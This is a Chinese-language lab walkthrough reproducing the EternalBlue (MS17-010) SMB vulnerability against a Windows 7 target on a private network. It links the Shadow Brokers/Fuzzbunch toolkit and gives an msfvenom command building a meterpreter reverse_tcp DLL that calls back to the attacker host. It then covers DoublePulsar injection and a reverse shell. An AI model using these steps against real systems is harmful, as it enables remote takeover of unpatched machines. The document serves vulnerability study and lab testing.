1 永恆之藍漏洞復現(ms17-010)
1.1 漏洞描述:
Eternalblue通過TCP端口445和139來利用SMBv1和NBT中的遠程代碼執行漏洞,惡意代碼會掃描開放445文件共享端口的Windows機器,無需用戶任何操作,只要開機上網,不法分子就能在電腦和服務器中植入勒索軟件、遠程控制木馬、虛擬貨幣挖礦機等惡意程序。
1.2 漏洞影響:
目前已知受影響的 Windows 版本包括但不限於:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
1.3 漏洞復現:
1.3.1 環境搭建
攻擊機1: Kali-Linux-2017.1-vm-amd64 IP:192.168.1.250,
攻擊機2: windows7 x86 SP1 IP:192.168.1.3
靶 機: windows7 x64 IP:192.168.1.30
1.3.1.1 Windows7 (x86)攻擊機工具安裝及配置
Python 2.6:https://www.python.org/download/releases/2.6/
PyWin32 v212:https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
Shadow Brokers工具包:https://github.com/misterch0c/shadowbroker.git
Python2.6工具直接安裝即可,PyWin32 v212的安裝需要以管理員權限執行,shadowbrokers-master直接解壓到指定目錄,在其子目錄windows中建立listeningposts文件夾,同時修改FuzzyBunch.xml文件內容,設置相應的ResourcesDir和LogDir參數值,修改結果如下圖所示。

驗證fuzzbunch是否成功安裝,結果如下圖所示。

界面顯示fuzzbunch版本等相關信息表示該工具已成功安裝。
1.3.2 Kali下生成木馬程序
Kali下生成木馬程序使用到metasploit framework中的msfvenom,具體參數可參考文檔:http://www.freebuf.com/sectool/72135.html。這里我們使用到-p和-f兩個參數,分別表示載荷和格式,具體命令為:
msfvenom –p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.250 LPORT=5555 –f dll > s.dll
說明:-p指定攻擊載荷,LHOST指定監聽地址,LPORT指定監聽端口,-f指定木馬程序格式為dll,>指定生成木馬程序的保存路徑,s.dll表示木馬程序保存在當前目錄下,我們可以通過ls查看。

1.3.3 Fuzzbunch基本配置
將生成的木馬程序copy到win7攻擊機中c盤根目錄下。然后使用fuzzbunch做些簡單的配置,配置參數如下圖所示。

基本配置設置完成后,開始新建項目,根據提示,我們選擇5,然后給項目起個名稱,其它設置保持默認即可,結果如下圖所示。

項目配置完成后,下面直接使用永恆之藍模塊建立后門,具體配置如以下各圖所示,除特別說明外,其它配置保持默認即可。

此處操作系統選擇1。

此處選擇1。
最終結果如下圖所示。

1.3.4 Kali下開啟監聽
同樣使用windows/x64/meterpreter/reverse_tcp載荷,具體參數設置如下圖所示。

參數配置完成后執行exploit命令。
1.3.5 注入s.dll木馬程序
在windows7(x86)攻擊機中使用Doublepulsar模塊向靶機注入木馬程序,具體過程如以下各圖所示,除特殊說明外,其它配置保持默認即可。

操作系統選擇64位的,如下圖所示。

指定木馬程序,如下圖所示。

1.3.6 Kali反彈shell結果
結果如以下各圖所示。


